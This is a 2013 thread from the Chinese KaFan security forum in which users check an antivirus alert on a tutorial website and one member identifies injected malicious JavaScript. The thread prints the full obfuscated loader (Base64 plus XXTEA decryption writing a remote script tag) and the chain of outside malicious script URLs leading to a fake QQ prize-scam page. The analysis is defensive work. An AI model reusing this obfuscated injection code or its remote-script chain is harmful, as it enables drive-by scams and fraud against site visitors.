查看: 4275|回复: 17
收起左侧

[已鉴定] 应该是网页误报,求帮忙分析【挂马BY zhengshixin163 】

[复制链接]
mefanfine
发表于 2013-5-11 14:26:01 | 显示全部楼层 |阅读模式
本帖最后由 哀酱俏佳人 于 2013-5-11 21:09 编辑

http://www.52liunian.com/html/2012/rumen_0805/2455.html  这个网站,如下图。应该是没问题的,以前小A就不报,祁连山老师的教程视频网站,人人网上他的连接,按说是没有问题的。祁连山老师cs3的视频我也看过,全面而且制作质量高,肯定不会刻意搞这些动作。
未命名.jpg
mefanfine
 楼主| 发表于 2013-5-11 14:32:50 | 显示全部楼层
网页卡,多发了。不好意思,求删除
a694206011
发表于 2013-5-11 15:09:07 | 显示全部楼层
KIS也报了。目测是真挂毒了吧
QQ截图20130511150726.png
qdy2009
发表于 2013-5-11 15:21:12 | 显示全部楼层
eav也报
colinch
发表于 2013-5-11 15:38:42 | 显示全部楼层
嗯,我这里小a也弹窗,不明原因。
放在URL在线检测网站看了看,结果链接:http://urlquery.net/report.php?id=2416334

zhengshixin163
头像被屏蔽
发表于 2013-5-11 15:40:16 | 显示全部楼层
本帖最后由 zhengshixin163 于 2013-5-11 15:55 编辑

找到钓鱼代码
t="Dacv2lRQG17idRE1rqzoDDVqnaUvJYZm5Ou6fhyB7GnT+5HxClCUbZCko4eR51V1zJikNEzepXnZWa62dPIUcEOTBO4=";
t=utf8to16(xxtea_decrypt(base64decode(t), '123456789abcdef'));
document.write (t);


解密后为
<SCRIPT src="http://www.googleadsl.com/spcode/cp.js"></script>

跳转到
  1. http://www.230596.com/d/file/news/world/sizer.js
复制代码
引入
  1. http://www.joinin.com.cn/en/flash/project/demo.asp
复制代码
这个地址再引入
  1. http://www.230596.com/d/file/news/world/resed.js
复制代码
具体行为:
右下角出现QQ中奖诈骗小窗口,10s后弹出提示【尊敬的QQ用户:您即将获得腾讯公司送出的奖金¥88000元以及三星Q4笔记本电脑一台。您的领奖验证码是:8663】并跳转到
  1. http://www.ctdsb.net/caches/configs/%23/in.html
复制代码

评分

参与人数 3经验 +100 人气 +1 收起 理由
蓝核 + 60 感谢解答: )
哀酱俏佳人 + 40 版区有你更精彩: )
m220011 0 + 1 感谢解答: )

查看全部评分

zhengshixin163
头像被屏蔽
发表于 2013-5-11 15:45:12 | 显示全部楼层
相关代码:

  1. function utf8to16(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=str.charCodeAt(i++);switch(c>>4)
  2. {case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}
  3. return out.join('');}
  4. var base64DecodeChars=new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);
  5. function base64decode(str)
  6. {var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out = "";while(i<len)
  7. {do
  8. {c1=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);if(c1==-1)
  9. break;do
  10. {c2=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);if(c2==-1)
  11. break;out+=String.fromCharCode((c1<<2)|((c2&0x30)>>4));do
  12. {c3=str.charCodeAt(i++)&0xff;if(c3==61)
  13. return out;c3=base64DecodeChars[c3]}while(i<len&&c3==-1);if(c3==-1)
  14. break;out+=String.fromCharCode(((c2&0XF)<<4)|((c3&0x3C)>>2));do
  15. {c4=str.charCodeAt(i++)&0xff;if(c4==61)
  16. return out;c4=base64DecodeChars[c4]}while(i<len&&c4==-1);if(c4==-1)
  17. break;out+=String.fromCharCode(((c3&0x03)<<6)|c4)}
  18. return out}
  19. function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++)
  20. {v[i]=String.fromCharCode(v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);}
  21. if(w){return v.join('').substring(0,sl);}
  22. else{return v.join('');}}
  23. function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4)
  24. {v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;}
  25. if(w){v[v.length]=len;}
  26. return v;}
  27. function xxtea_decrypt(str,key){if(str==""){return"";}
  28. var v=str2long(str,false);var k=str2long(key,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}
  29. z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}
  30. return long2str(v,true);}
  31. t="Dacv2lRQG17idRE1rqzoDDVqnaUvJYZm5Ou6fhyB7GnT+5HxClCUbZCko4eR51V1zJikNEzepXnZWa62dPIUcEOTBO4=";
  32. t=utf8to16(xxtea_decrypt(base64decode(t), '123456789abcdef'));
  33. document.write (t);
复制代码
其中有UTF8to16、XXTea算法和Base64算法
m220011
发表于 2013-5-11 15:52:39 | 显示全部楼层
  1. http://www.52liunian.com/statics/js/jquery.sgallery.js
复制代码
剩下的就是zhengshixin163说的








    骄傲的使用Chrome


    Powered By Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31
    曹亮亮
    发表于 2013-5-11 18:19:19 | 显示全部楼层
    卡巴和360杀毒报毒
    mefanfine
     楼主| 发表于 2013-5-12 09:40:06 | 显示全部楼层
    zhengshixin163 发表于 2013-5-11 15:40
    找到钓鱼代码
    t="Dacv2lRQG17idRE1rqzoDDVqnaUvJYZm5Ou6fhyB7GnT+5HxClCUbZCko4eR51V1zJikNEzepXnZWa62dPI ...

    谢谢!那我看看能不能举报下
    您需要登录后才可以回帖 登录 | 快速注册

    本版积分规则

    手机版|杀毒软件|软件论坛| 卡饭论坛

    Copyright © KaFan  KaFan.cn All Rights Reserved.

    Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-22 16:21 , Processed in 0.146785 second(s), 20 queries .

    卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

    快速回复 客服 返回顶部 返回列表